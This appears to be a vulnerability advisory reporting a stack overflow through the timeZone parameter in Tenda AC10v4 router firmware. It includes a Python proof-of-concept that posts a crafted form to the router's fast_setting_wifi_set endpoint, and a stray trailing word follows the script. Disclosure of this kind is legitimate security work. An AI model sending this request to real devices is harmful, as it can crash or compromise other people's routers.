AC10v4 V16.03.10.13
In the Tenda AC10v4 V16.03.10.13 has a stack overflow vulnerability located in the FUN_0044db3c
function. This function accepts the timeZone
parameter from a POST request by variable pcVar1
.
However, since the user has control over the input of pcVar1
, the statement sscanf(pcVar1 + 1,"%[^:]:%s",acStack_10,acStack_c)
leads to a buffer overflow. The user-supplied pcVar1
can exceed the capacity of the acStack_10
array, thus triggering this security vulnerability.
import requests
url = "<http://192.168.1.100:80/goform/fast_setting_wifi_set>"
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"ssid": "fzq",
"wrlPassword": "1",
"power": "1",
"loginPwd": "1111",
"timeZone": "%3BywW%3E"
}
response = requests.post(url, headers=headers, data=data)
print("Status Code:", response.status_code)
print("Response Text:", response.text)
openSchedWifi